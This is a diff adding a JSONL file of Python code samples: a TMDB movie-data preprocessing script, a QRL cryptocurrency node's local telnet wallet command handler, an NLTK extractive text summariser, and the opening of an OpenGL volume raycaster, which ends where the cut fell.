diff --git "a/462.jsonl" "b/462.jsonl" new file mode 100644--- /dev/null +++ "b/462.jsonl" @@ -0,0 +1,763 @@ +{"seq_id":"573379885","text":"#### THE CODE IN THIS FILE IS SOURCED FROM THE LINK IN README.MD ###\n\n\n# This file converts the original \"tmdb_5000\" data from kaggle into data that can be used\n# for recommendation. Involves joining tables with movie metadata(crew, cast etc) and movie information\n# into one. New data is written to a .csv file and then read when using the program. This file is only run once\n# to create the \"movie_data.csv\" file.\n\nimport numpy as np\nimport pandas as pd\nfrom ast import literal_eval\n\ndf1 = pd.read_csv(r'C:\\Users\\rishi_rhvenli\\PycharmProjects\\MovieRec\\Data\\tmdb_5000_credits.csv')\ndf2 = pd.read_csv(r'C:\\Users\\rishi_rhvenli\\PycharmProjects\\MovieRec\\Data\\tmdb_5000_movies.csv')\ndf1.columns = ['id', 'title', 'cast', 'crew']\n\n# Merge the 2 dataframes by movie-id\ndf2= df2.merge(df1, on='id')\n\ndf2['overview'] = df2['overview'].fillna('')\n\nfeatures = ['cast', 'crew', 'genres']\nfor feature in features:\n df2[feature] = df2[feature].apply(literal_eval)\n\n\n# Extract the director from the crew-list\ndef get_director(x):\n for i in x:\n if i['job'] == 'Director':\n return i['name']\n return np.nan\n\n\n# Used to extract top-4 items in a list (eg: top 4 cast members in a movie)\ndef get_list(x):\n if isinstance(x, list):\n names = [i['name'] for i in x]\n if len(names) > 4:\n names = names[:4]\n return names\n return []\n\n\n# Extracts the director and other meta-information from the dataframe\ndf2['director'] = df2['crew'].apply(get_director)\nfeatures = ['cast', 'genres']\nfor feature in features:\n df2[feature] = df2[feature].apply(get_list)\n\n\n# Converts data in 'x' to lower case and removes all spaces.\n# Done to differentiate, for example, Chris Pratt from Chris Evans\ndef clean_data(x):\n if isinstance(x, list):\n return [str.lower(i.replace(\" \", \"\")) for i in x]\n else:\n if isinstance(x, str):\n return str.lower(x.replace(\" \", \"\"))\n else:\n return ''\n\n\n# Cleans the data in the newly made columns\nfeatures = ['cast', 'director', 'genres']\nfor feature in features:\n df2[feature] = df2[feature].apply(clean_data)\ndf2['new_title'] = df2['original_title'].apply(clean_data)\n\n\n# Creates a 'soup' of information that can be used to check for 'similar' movies\ndef create_soup(x):\n return ' ' + ' '.join(x['cast']) + ' ' + x['director'] + ' ' + ' '.join(x['genres'])\n\n\ndf2['soup'] = df2.apply(create_soup, axis=1)\ndf2.to_csv(r'C:\\Users\\rishi_rhvenli\\PycharmProjects\\MovieRec\\Data\\movie_data.csv', index=None, header=True)\n# DATA PROCESSING ENDS\n\n","sub_path":"PythonFiles/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"475296891","text":"# coding=utf-8\n# Distributed under the MIT software license, see the accompanying\n# file LICENSE or http://www.opensource.org/licenses/mit-license.php.\n\nimport time\nfrom io import StringIO\n\nimport simplejson as json\nfrom twisted.internet.protocol import Protocol, connectionDone\n\nfrom pyqrllib.pyqrllib import mnemonic2bin, hstr2bin, bin2hstr\nfrom qrl.core import helper, logger, config\nfrom qrl.crypto.words import wordlist\nfrom qrl.crypto.xmss import XMSS\n\n\ndef hexseed_to_seed(hex_seed):\n if len(hex_seed) != 96:\n return False\n return hstr2bin(hex_seed)\n\n\n# FIXME: Clean this up\n\nclass WalletProtocol(Protocol):\n def __init__(self):\n self.cmd_mapping = {\n \"create\": self._create,\n \"getnewaddress\": self._getnewaddress,\n \"hexseed\": self._hexseed,\n \"seed\": self._seed,\n \"search\": self._search,\n \"json_block\": self._json_block,\n \"savenewaddress\": self._savenewaddress,\n \"recoverfromhexseed\": self._recoverfromhexseed,\n \"recoverfromwords\": self._recoverfromwords,\n \"stake\": self._stake,\n \"stakenextepoch\": self._stakenextepoch,\n \"send\": self._send,\n \"mempool\": self._mempool,\n \"help\": self._help,\n \"quit\": self._quit,\n \"exit\": self._quit,\n \"wallet\": self._wallet,\n \"getinfo\": self._getinfo,\n \"blockheight\": self._blockheight,\n \"peers\": self._peers,\n \"reboot\": self._reboot,\n }\n self.cmd_list = list(self.cmd_mapping.keys())\n\n self.output = {'status': 1,\n 'keys': [],\n 'message': StringIO()}\n\n self.isJSON = False\n\n def parse_cmd(self, data):\n # Parse out passed in argument to get:\n # 1. Command ([0])\n # 1. 0-Many arguments ([1:])\n\n # Get entered line as an array of strings delimited by \"space.\"\n # Will chomp away any extra spaces\n data = data.split()\n # Arguments include anything beyond the first index\n\n if len(data) != 0: # if anything was entered\n\n command = data[0]\n args = None\n if len(data) > 0: # args optional\n args = data[1:]\n\n if command in self.cmd_mapping:\n self.cmd_mapping[command](args)\n\n else:\n return False\n\n return True\n\n # Called when a command is recieved through telnet\n # Might be a good idea to use a json encrypted wallet\n def dataReceived(self, data):\n try:\n data = data.strip().decode()\n\n self.factory.recn += 1\n self.isJSON = False\n if data.lower().startswith('json '):\n self.isJSON = True\n data = data[5:]\n\n if not self.parse_cmd(data):\n self.output['status'] = 1\n self.output['message'].write(\">>> Command not recognised. Use 'help' for details \\r\\n\")\n except KeyboardInterrupt as e:\n self.output['message'] = StringIO()\n self.output['message'].write('Unexpected Error\\r\\nReport to QRL Developers')\n logger.error('Unexpected Error WalletProtocol\\n')\n logger.exception(e)\n\n self.output['message'] = self.output['message'].getvalue()\n\n try:\n if self.isJSON:\n self.transport.write('%s' % (str(json.dumps(self.output)),))\n else:\n self.transport.write(bytes(str(self.output['message']), 'utf-8'))\n except Exception as e:\n logger.error('Walletprotocol unexpected exception while sending msg to client')\n logger.exception(e)\n\n del self.output\n self.output = {'status': 1,\n 'keys': [],\n 'message': StringIO()}\n\n # What does this do?\n # whenever you type telnet 127.0.0.1 2000\n # a connection is made and this function is called to initialize the things.\n def connectionMade(self):\n self.transport.write(b'QRL node connection established. Try starting with \"help\" ')\n self.factory.connections += 1\n if self.factory.connections > 1:\n logger.info('only one local connection allowed')\n self.transport.write(b'only one local connection allowed, sorry')\n self.transport.loseConnection()\n else:\n if self.transport.getPeer().host == '127.0.0.1':\n logger.info('>>> new local connection %s %s', str(self.factory.connections), self.transport.getPeer())\n else:\n self.transport.loseConnection()\n logger.info('Unauthorised remote login attempt..')\n\n def connectionLost(self, reason=connectionDone):\n self.factory.connections -= 1\n\n ###################################### LOCAL WALLET ACCESS ###############################################\n\n # Pseudocode:\n\n # is chain up to date? If not, fail/inform user\n # is address null/void? If it is, fail/print usage instructions\n # is the first letter of the address Q? If not, fail/print usage instructions\n # is the address in use? If not, fail/inform user\n\n # if all of these are met, return the balance\n def getbalance(self, addr):\n self.output['status'] = 1\n\n # is chain up to date? If not, fail/inform user\n if self.factory.state.state_uptodate(self.factory.chain.height()) is False:\n self.output['message'].write('>>> LevelDB not up to date..\\r\\n')\n # add \"force\" argument to bring it up to date and get balance?\n return\n\n # is address null/void? If it is, fail/print usage instructions\n if not addr:\n self.output['message'].write('>>> Usage: getbalance
(Addresses begin with Q)\\r\\n')\n return\n\n # is the first letter of the address Q? If not, fail/print usage instructions\n if addr[0][0] != 'Q':\n self.output['message'].write('>>> Usage: getbalance
(Addresses begin with Q)\\r\\n')\n return\n\n # is the address in use? If not, fail/inform user\n if self.factory.state.state_address_used(addr[0]) is False:\n self.output['message'].write(bytes('>>> Unused address: ' + addr + '\\r\\n', 'utf-8'))\n return\n\n # if all of these are met, return the balance\n self.output['status'] = 0\n balance = self.factory.state.state_balance(addr[0])\n self.output['message'].write(bytes('>>> balance: ' + str(balance) + '\\r\\n', 'utf-8'))\n self.output['keys'] += ['balance']\n self.output['balance'] = balance\n return\n\n # Pseudocode:\n # If no arguments are used, or more than 3 are used, fail/inform user of usage\n # else:\n #\tget signature type to use, reject if the type is incorrect\n # prevent user from generating an extremely large number of XMSS signatures\n #\tgenerate address\n #\tinform user of address information\n #\ttell them how to save the address to wallet file\n def _getnewaddress(self, args):\n self.output['status'] = 0\n self.output['message'].write('>>> Creating new address, please be patient as this can take some time ...\\r\\n')\n self.output['keys'] += ['keypair_type', 'possible_signatures', 'address']\n\n addr_bundle = self.factory.chain.wallet.get_new_address()\n\n self.output['message'].write('>>> Keypair type: ' + ''.join(addr_bundle[1].get_type() + '\\r\\n'))\n self.output['message'].write(\n '>>> Signatures possible with address: ' + str(addr_bundle[1].get_number_signatures()) + '\\r\\n')\n self.output['message'].write('>>> Address: ' + addr_bundle[1].get_address() + '\\r\\n')\n\n self.output['keypair_type'] = ''.join(addr_bundle[1].get_type() + '\\r\\n')\n self.output['possible_signatures'] = str(addr_bundle[1].get_number_signatures())\n self.output['address'] = addr_bundle[1].get_address()\n\n # TODO: Would you like to save this address to your wallet file (call savenewaddress)? Y/N\n self.output['message'].write(\">>> type 'savenewaddress' to append to wallet file\" + '\\r\\n')\n self.factory.newaddress = addr_bundle\n\n # Simply saves wallet information\n def _savenewaddress(self, args):\n self.output['status'] = 1\n if not self.factory.newaddress:\n self.output['message'].write(\">>> No new addresses created, yet. Try 'getnewaddress'\" + '\\r\\n')\n return\n self.output['status'] = 0\n self.factory.chain.wallet.append_wallet(self.factory.newaddress)\n self.output['message'].write('>>> new address saved in self.factory.chain.wallet.\\r\\n')\n return\n\n # This method is for sending between local wallets as well as network wallets\n def _send(self, args):\n self.output['status'] = 1\n if not args or len(args) < 3:\n self.output['message'].write('>>> Usage: send []\\r\\n')\n self.output['message'].write('>>> i.e. send 0 4 100 5\\r\\n')\n self.output['message'].write('>>> ^ will send 100 coins from address 0 to 4 from the wallet\\r\\n')\n self.output['message'].write('>>> can be a pasted address (starts with Q)\\r\\n')\n self.output['message'].write('>>> 5 is the txn fee\\r\\n')\n return\n\n wallet_from = args[0]\n wallet_to = args[1]\n amount_arg = args[2]\n fee_arg = 0\n if len(args) == 4:\n fee_arg = args[3]\n\n qrlnode = self.factory.qrlnode\n\n ########################\n ########################\n\n try:\n wallet_from = qrlnode.get_wallet_absolute(wallet_from)\n wallet_to = qrlnode.get_wallet_absolute(wallet_to)\n amount = qrlnode.get_dec_amount(amount_arg)\n fee = qrlnode.get_dec_amount(fee_arg)\n\n tx = qrlnode.transfer_coins(wallet_from, wallet_to, amount, fee)\n\n except Exception as e:\n self.output['message'].write(str(e))\n return\n\n ########################\n ########################\n # FIXME: Clean below\n\n self.output['status'] = 0\n self.output['message'].write('>>> ' + bin2hstr(tx.txhash))\n # FIXME: Review all quantities\n # FIXME: Magic number? Unify\n self.output['message'].write('>>> From: ' + str(tx.txfrom) + ' To: ' + str(tx.txto) + ' For: ' + str(\n tx.amount / 100000000.000000000) + ' Fee: ' + str(tx.fee / 100000000.000000000) + '\\r\\n')\n self.output['message'].write('>>>created and sent into p2p network\\r\\n')\n\n def _wallet(self, args):\n if not self.factory.state.state_uptodate(self.factory.chain.height()):\n self.factory.state.state_read_chain(self.factory.chain)\n\n self.output['status'] = 0\n self.output['message'].write('>>> Wallet contents:\\r\\n')\n self.output['keys'] += ['list_addresses']\n self.output['list_addresses'] = {}\n\n list_addr, list_addresses = self.factory.chain.wallet.list_addresses(self.factory.chain.state,\n self.factory.chain.transaction_pool, True)\n self.output['list_addresses'] = list_addresses\n\n y = 0\n for address in list_addr:\n self.output['message'].write(str(y) + str(address) + '\\r\\n')\n y += 1\n\n def _create(self, args):\n self.factory.p2pFactory.pos.create_next_block(int(args[0]))\n self.output['status'] = 0\n self.output['message'].write('Creating blocknumber #' + str(args[0]))\n\n def _hexseed(self, args):\n for addr_bundle in self.factory.chain.wallet.address_bundle:\n if isinstance(addr_bundle.xmss, XMSS):\n self.output['status'] = 0\n self.output['message'].write('Address: ' + addr_bundle.xmss.get_address() + '\\r\\n')\n self.output['message'].write('Recovery seed: ' + addr_bundle.xmss.get_hexseed() + '\\r\\n')\n self.output['keys'] += ['Address', 'Recovery seed']\n self.output['Address'] = addr_bundle.xmss.get_address()\n self.output['Recovery seed'] = addr_bundle.xmss.get_hexseed()\n\n def _seed(self, args):\n for addr_bundle in self.factory.chain.wallet.address_bundle:\n if isinstance(addr_bundle.xmss, XMSS):\n self.output['status'] = 0\n self.output['message'].write('Address: ' + addr_bundle.xmss.get_address() + '\\r\\n')\n self.output['message'].write('Recovery seed: ' + addr_bundle.xmss.get_mnemonic() + '\\r\\n')\n self.output['keys'] += ['Address', 'Recovery seed']\n\n def _search(self, args):\n if not args:\n self.output['status'] = 1\n self.output['message'].write('>>> Usage: search \\r\\n')\n return None\n\n tmp_output = None\n if args[0][0] == 'Q':\n # FIXME: Accessing private member\n # FIXME: Access to another\n tmp_output = json.loads(self.factory.apiFactory.search_address(args[0]))\n self.output['message'].write('Address: ' + str(args[0]))\n self.output['message'].write('\\r\\nBalance: ' + str(tmp_output['state']['balance']))\n self.output['message'].write('\\r\\nTransactions: ' + str(tmp_output['state']['transactions']))\n for tx in tmp_output['transactions']:\n self.output['message'].write(str(tx['txhash']))\n self.output['message'].write(' ')\n self.output['message'].write(str(tx['txfrom']))\n self.output['message'].write(' ')\n self.output['message'].write(str(tx['txto']))\n self.output['message'].write(' ')\n self.output['message'].write(str(tx['amount']))\n self.output['message'].write('\\r\\n')\n else:\n tmp_output = json.loads(self.factory.apiFactory.search_txhash(args[0]))\n self.output['message'].write('Txnhash: ')\n self.output['message'].write(args[0])\n if tmp_output['status'] == 'Error':\n self.output['message'].write('\\r\\n')\n self.output['message'].write(str(tmp_output['error']))\n self.output['message'].write('\\r\\n')\n return True\n self.output['message'].write('\\r\\nTimestamp: ')\n self.output['message'].write(tmp_output['timestamp'])\n self.output['message'].write('\\r\\nBlockNumber: ')\n self.output['message'].write(tmp_output['block'])\n self.output['message'].write('\\r\\nConfirmations: ')\n self.output['message'].write(tmp_output['confirmations'])\n self.output['message'].write('\\r\\nAmount: ')\n self.output['message'].write(tmp_output['amount'])\n self.output['message'].write('\\r\\n')\n\n if not tmp_output:\n self.output['status'] = 1\n self.output['message'].write('>>> No Information available')\n return True\n\n for key in list(tmp_output.keys()):\n self.output['keys'] += [str(key)]\n self.output[key] = tmp_output[key]\n\n self.output['status'] = 0\n self.output['message'].write('')\n\n def _json_block(self, args):\n if not args:\n self.output['message'].write(\n helper.json_print_telnet(self.factory.chain.m_get_last_block()) + '\\r\\n')\n return True\n try:\n int(args[0])\n except:\n self.output['message'].write('>>> Try \"json_block \" \\r\\n')\n return True\n\n if int(args[0]) > self.factory.chain.m_blockheight():\n self.output['message'].write('>>> Block > Blockheight\\r\\n')\n return True\n self.output['status'] = 0\n self.output['message'].write(\n helper.json_print_telnet(self.factory.chain.m_get_block(int(args[0]))) + '\\r\\n')\n\n def _recoverfromhexseed(self, args):\n if not args or not hexseed_to_seed(args[0]):\n self.output['message'].write('>>> Usage: recoverfromhexseed \\r\\n')\n self.output['message'].write('>>> Could take up to a minute..\\r\\n')\n self.output['message'].write('>>> savenewaddress if Qaddress matches expectations..\\r\\n')\n return True\n\n self.output['status'] = 0\n addr = self.factory.chain.wallet.get_new_address(address_type='XMSS', seed=hexseed_to_seed(args[0]))\n self.factory.newaddress = addr\n self.output['message'].write('>>> Recovery address: ' + addr[1].get_address() + '\\r\\n')\n self.output['message'].write('>>> Recovery seed phrase: ' + addr[1].get_mnemonic() + '\\r\\n')\n self.output['message'].write('>>> hexSEED confirm: ' + addr[1].get_hexseed() + '\\r\\n')\n self.output['message'].write('>>> savenewaddress if Qaddress matches expectations..\\r\\n')\n\n self.output['keys'] += ['recovery_address', 'recovery_seed_phrase', 'hexseed_confirm']\n self.output['recovery_address'] = addr[1].get_address()\n self.output['recovery_seed_phrase'] = addr[1].get_mnemonic()\n self.output['hexseed_confirm'] = addr[1].get_hexseed()\n\n def _recoverfromwords(self, args):\n if not args:\n self.output['message'].write(\n '>>> Usage: recoverfromwords \\r\\n')\n return True\n self.output['message'].write('>>> trying..this could take up to a minute..\\r\\n')\n if len(args) != 32:\n self.output['message'].write(\n '>>> Usage: recoverfromwords \\r\\n')\n return True\n\n args = ' '.join(args)\n addr = self.factory.chain.wallet.get_new_address(address_type='XMSS', seed=mnemonic2bin(args, wordlist))\n self.factory.newaddress = addr\n self.output['status'] = 0\n self.output['message'].write('>>> Recovery address: ' + addr[1].get_address() + '\\r\\n')\n self.output['message'].write('>>> Recovery hexSEED: ' + addr[1].get_hexseed() + '\\r\\n')\n self.output['message'].write('>>> Mnemonic confirm: ' + addr[1].get_mnemonic() + '\\r\\n')\n self.output['message'].write('>>> savenewaddress if Qaddress matches expectations..\\r\\n')\n\n self.output['keys'] += ['recovery_address', 'recovery_hexseed', 'mnemonic_confirm']\n self.output['recovery_address'] = addr[1].get_address()\n self.output['recovery_hexseed'] = addr[1].get_hexseed()\n self.output['mnemonic_confirm'] = addr[1].get_mnemonic()\n\n def _stake(self, args):\n self.output['status'] = 0\n self.output['message'].write(\n '>> Toggling stake from: ' + str(self.factory.p2pFactory.stake) + ' to: ' + str(\n not self.factory.p2pFactory.stake) + '\\r\\n')\n self.factory.p2pFactory.stake = not self.factory.p2pFactory.stake\n logger.info(('STAKING set to: ', self.factory.p2pFactory.stake))\n self.output['keys'] += ['stake']\n self.output['stake'] = self.factory.p2pFactory.stake\n\n def _stakenextepoch(self, args):\n self.output['status'] = 0\n self.output['message'].write(\n '>>> Sending a stake transaction for address: ' + self.factory.chain.mining_address + ' to activate next epoch(' + str(\n config.dev.blocks_per_epoch - (\n self.factory.chain.m_blockchain[-1].blockheader.blocknumber - (\n self.factory.chain.m_blockchain[\n -1].blockheader.epoch * config.dev.blocks_per_epoch))) + ' blocks time)\\r\\n')\n\n logger.info(('STAKE for address:', self.factory.chain.mining_address))\n\n blocknumber = self.factory.chain.block_chain_buffer.height() + 1\n self.factory.p2pFactory.pos.make_st_tx(blocknumber=blocknumber, first_hash=None)\n\n def _mempool(self, args):\n self.output['status'] = 0\n self.output['message'].write('>>> Number of transactions in memory pool: ' + str(\n len(self.factory.chain.transaction_pool)) + '\\r\\n')\n self.output['keys'] += ['txn_nos']\n self.output['txn_nos'] = len(self.factory.chain.transaction_pool)\n\n def _help(self, args):\n self.output['status'] = 0\n self.output['message'].write(\n '>>> QRL ledger help: try {}'.format(', '.join(self.cmd_list)) + '\\r\\n')\n\n def _quit(self, args):\n self.transport.loseConnection()\n\n def _getinfo(self, args):\n self.output['status'] = 0\n self.output['message'].write('>>> Version: ' + config.dev.version_number + '\\r\\n')\n self.output['message'].write('>>> Uptime: ' + str(time.time() - self.factory.start_time) + '\\r\\n')\n self.output['message'].write(\n '>>> Nodes connected: ' + str(len(self.factory.p2pFactory.peer_connections)) + '\\r\\n')\n self.output['message'].write('>>> Staking set to: ' + str(self.factory.p2pFactory.stake) + '\\r\\n')\n self.output['message'].write('>>> Sync status: ' + self.factory.p2pFactory.nodeState.state.name + '\\r\\n')\n\n self.output['keys'] += ['version', 'uptime', 'nodes_connected', 'staking_status', 'sync_status']\n self.output['version'] = config.dev.version_number\n self.output['uptime'] = str(time.time() - self.factory.start_time)\n self.output['nodes_connected'] = str(len(self.factory.p2pFactory.peer_connections))\n self.output['staking_status'] = str(self.factory.p2pFactory.stake)\n self.output['sync_status'] = self.factory.p2pFactory.nodeState.state.name\n\n def _blockheight(self, args):\n self.output['status'] = 0\n self.output['message'].write('>>> Blockheight: ' + str(self.factory.chain.m_blockheight()) + '\\r\\n')\n self.output['message'].write(\n '>>> Headerhash: ' + bin2hstr(self.factory.chain.m_blockchain[-1].blockheader.headerhash) + '\\r\\n')\n\n self.output['keys'] += ['blockheight', 'headerhash']\n self.output['blockheight'] = self.factory.chain.m_blockheight()\n self.output['headerhash'] = bin2hstr(self.factory.chain.m_blockchain[-1].blockheader.headerhash)\n\n def _peers(self, args):\n self.output['status'] = 0\n self.output['message'].write('>>> Connected Peers:\\r\\n')\n self.output['keys'] += ['peers']\n self.output['peers'] = {}\n for peer in self.factory.p2pFactory.peer_connections:\n self.output['message'].write(\n '>>> ' + peer.conn_identity + \" [\" + peer.version + \"] blockheight: \" + str(\n peer.blockheight) + '\\r\\n')\n self.output['peers'][peer.conn_identity] = {}\n self.output['peers'][peer.conn_identity]['version'] = peer.version\n self.output['peers'][peer.conn_identity]['blockheight'] = peer.blockheight\n\n def _reboot(self, args):\n if len(args) < 1:\n self.output['message'].write('>>> reboot \\r\\n')\n self.output['message'].write('>>> or\\r\\n')\n self.output['message'].write('>>> reboot \\r\\n')\n self.output['message'].write('>>> or\\r\\n')\n self.output['message'].write('>>> reboot \\r\\n')\n return True\n json_hash, err = None, None\n if len(args) == 3:\n json_hash, status = self.factory.chain.generate_reboot_hash(args[0], args[1], args[2])\n self.output['message'].write(str(args[0]) + str(args[1]) + str(args[2]))\n elif len(args) == 2:\n json_hash, status = self.factory.chain.generate_reboot_hash(args[0], args[1])\n else:\n json_hash, status = self.factory.chain.generate_reboot_hash(args[0])\n\n if json_hash:\n self.factory.p2pFactory.send_reboot(json_hash)\n # self.factory.state.update(NState.synced)\n self.output['message'].write(status)\n","sub_path":"qrl/core/walletprotocol.py","file_name":"walletprotocol.py","file_ext":"py","file_size_in_byte":23919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196747040","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 19 20:27:13 2020\n\n@author: GUPTA50\n\"\"\"\n\n#Importing the required libraries\nimport re\nimport nltk\nimport heapq\n\n\narticle_text = \"\"\n\n\n#Reading the data from the text file and creating article text\ndef text_read():\n with open(\"Economy.txt\", \"r\") as f:\n paragraphs = f.readlines()\n return paragraphs\n\n\ndef Text_processing():\n global article_text\n paragraphs = text_read()\n for p in paragraphs:\n article_text += p\n # Removing Square Brackets and Extra Spaces\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n article_text = re.sub(r'\\s+', ' ', article_text)\n # Removing special characters and digits\n formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )\n #Creating a list of the stopwords using nltk library\n stopwords = nltk.corpus.stopwords.words('english')\n word_frequencies = {}\n #Creating a dictionary, which has the frequence for each word like if GST is encountered seven times it will be like \"GST\": 7\n for word in nltk.word_tokenize(formatted_article_text):\n if word not in stopwords:\n if word not in word_frequencies.keys():\n word_frequencies[word] = 1\n else:\n word_frequencies[word] += 1\n\n maximum_frequency = max(word_frequencies.values())\n #to find the weighted frequency\n for word in word_frequencies.keys():\n word_frequencies[word] = (word_frequencies[word]/maximum_frequency)\n sentence_list = nltk.sent_tokenize(article_text)\n #Calcultion of sentence scores\n sentence_scores = {}\n for sent in sentence_list:\n for word in nltk.word_tokenize(sent.lower()):\n if word in word_frequencies.keys():\n if len(sent.split(' ')) < 30:\n if sent not in sentence_scores.keys():\n sentence_scores[sent] = word_frequencies[word]\n else:\n sentence_scores[sent] += word_frequencies[word]\n \n return sentence_scores\n#Taking the top 10 sentence to create the brief summary of the article \n\ndef summary():\n summary_sentences = heapq.nlargest(10, Text_processing(), key=Text_processing().get)\n summary = ' '.join(summary_sentences)\n with open(\"Economic_Summarization.txt\", \"w\") as f:\n f.write(summary) \n \n\nif __name__ == '__main__': \n summary()","sub_path":"Text_Summarization.py","file_name":"Text_Summarization.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423812375","text":"\"\"\"\nraycaster_cc6.py\n\n# Copyright (c) 2021, Minho Kim\n# Computer Graphics Lab, Dept. of Computer Science, University of Seoul\n# All rights reserved.\n\n\"\"\"\nfrom OpenGL.GL import *\nimport numpy as np\nimport os\nimport glfw\nimport glm\n\nclass VolumeInfo:\n def __init__(self, filename, dtype, dim, scale, level, inverted):\n self.filename = filename\n self.dtype = dtype\n self.dim = dim\n self.scale = scale\n self.level = level\n self.inverted = inverted\n\ntry:\n path_volume = os.environ['VOLUME_PATH']\nexcept:\n path_volume = './'\n\nvolumes = {\n 'ML_25' :VolumeInfo(path_volume + 'ML_25_f32.raw', np.float32, (49,49,49), (1,1,1), 0.5, False),\n 'ML_50' :VolumeInfo(path_volume + 'ML_50_f32.raw', np.float32, (99,99,99), (1,1,1), 0.5, False),\n }\n\n###################################################################################################################\n# bounding box of the volume\n#\n# - the bounding box may be composed of smaller min/max boxes for culling\n###################################################################################################################\nclass BBox:\n # dim: resolution of the volume dataset\n # scale: scaling of the volume dataset. Strictly speaking, if scale is not (1,1,1) \n # then we get a different lattice.\n#------------------------------------------------------------------------------------------------------------------------ \n def __init__(self, _dim, scale, size_fbo):\n self.dim = _dim\n\n self.fbo = FBO_bbox(size_fbo[0], size_fbo[1])\n\n # - Shaders to render the bounding box containing the whole volume.\n # - Used to set the starting/ending point of each ray.\n # - Less efficient than using `bbox_minmax.*' shaders.\n # - Used when `minmax' parameter of `render' function is FALSE.\n self.prog_bbox = Program('bbox.vert', 'bbox.frag', ['MVP', 'scale']) \n\n self.size = self.dim\n\n # - Used to fit the whole volume in viewport by re-scaling.\n self.size_max = max(self.size)\n\n # - The scaling of the bounding box.\n # - We obtain the properly scaled bounding box by applying this to a unit cube.\n self.scale_bbox = tuple(self.size[i]/self.size_max for i in range(3))\n\n # - Used to convert from [0,1]^3 space to the lattice space.\n # - Passed as `scale_axes' to raycasting shader.\n self.scale_axes = tuple(((self.dim[i])*self.size[i])/self.size_max for i in range(3))\n\n positions = np.array([ 0, 0, 1,\n 1, 0, 1,\n 1, 1, 1,\n 0, 1, 1,\n 0, 0, 0,\n 1, 0, 0,\n 1, 1, 0,\n 0, 1, 0],\n dtype=np.float32)\n indices = np.array([ 0, 1, 2, 2, 3, 0, # front\n 1, 5, 6, 6, 2, 1, # top\n 7, 6, 5, 5, 4, 7, # back\n 4, 0, 3, 3, 7, 4, # bottom\n 4, 5, 1, 1, 0, 4, # left\n 3, 2, 6, 6, 7, 3 # right\n ], dtype=np.int8)\n \n # Setting up the VAO for the bbox\n self.vao = glGenVertexArrays(1)\n glBindVertexArray(self.vao)\n\n self.vbo_position = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo_position)\n glBufferData(GL_ARRAY_BUFFER, len(positions)*ctypes.sizeof(ctypes.c_float), positions, GL_STATIC_DRAW)\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, None)\n\n self.vbo_idx = glGenBuffers(1)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vbo_idx)\n self.size_indices = len(indices)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, len(indices)*ctypes.sizeof(ctypes.c_ubyte), indices, GL_STATIC_DRAW)\n\n glBindVertexArray(0)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def render(self, MVP):\n glUseProgram(self.prog_bbox.id)\n glUniformMatrix4fv(self.prog_bbox.uniform_locs['MVP'], 1, GL_FALSE, MVP)\n glUniform3fv(self.prog_bbox.uniform_locs['scale'], 1, self.scale_bbox)\n glBindVertexArray(self.vao)\n glDrawElements(GL_TRIANGLES, self.size_indices, GL_UNSIGNED_BYTE, ctypes.c_void_p(0))\n glBindVertexArray(0)\n glUseProgram(0)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def render_backfaces(self, MVP):\n glDepthFunc(GL_GREATER)\n glClearDepth(0)\n glClearColor(0, 0, 0, 1)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )\n glEnable(GL_CULL_FACE)\n glCullFace(GL_FRONT)\n self.render(MVP)\n glDisable(GL_CULL_FACE)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def render_frontfaces(self, MVP):\n glDepthFunc(GL_LESS)\n glClearDepth(1)\n glClearColor(0, 0, 0, 1)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )\n glEnable(GL_CULL_FACE)\n glCullFace(GL_BACK)\n self.render(MVP)\n glDisable(GL_CULL_FACE)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def render_bbox(self, MVP):\n glViewport(0, 0, self.fbo.width, self.fbo.height)\n glBindFramebuffer(GL_FRAMEBUFFER, self.fbo.fbo)\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, self.fbo.buf_back, 0)\n self.render_backfaces(MVP)\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, self.fbo.buf_front, 0)\n self.render_frontfaces(MVP)\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n###################################################################################################################\nclass Volume:\n\n#------------------------------------------------------------------------------------------------------------------------ \n def __init__(self, info, size_fbo_bbox):\n\n self.load_data(info)\n\n self.bbox = BBox(self.info.dim, self.info.scale, size_fbo_bbox)\n\n self.dim_tex = [self.info.dim[0], self.info.dim[1], self.info.dim[2], 1]\n\n self.upload_data()\n \n#------------------------------------------------------------------------------------------------------------------------ \n def load_data(self, info):\n self.info = info\n scale = 1\n\n self.dim_max = max(max(self.info.dim[0], self.info.dim[1]), self.info.dim[2])\n \n # Always keep in float32 format...\n self.data = np.fromfile(info.filename, dtype=info.dtype).astype(np.float32)*scale\n\n#------------------------------------------------------------------------------------------------------------------------ \n def upload_data(self):\n if self.dim_tex[3] == 1:\n internal_format = GL_R32F\n format = GL_RED\n elif self.dim_tex[3] == 2:\n internal_format = GL_RG32F\n format = GL_RG\n\n self.texid = glGenTextures(1)\n glPixelStorei(GL_UNPACK_ALIGNMENT,1)\n glBindTexture(GL_TEXTURE_3D, self.texid)\n glTexParameterf(GL_TEXTURE_3D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_3D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_S, 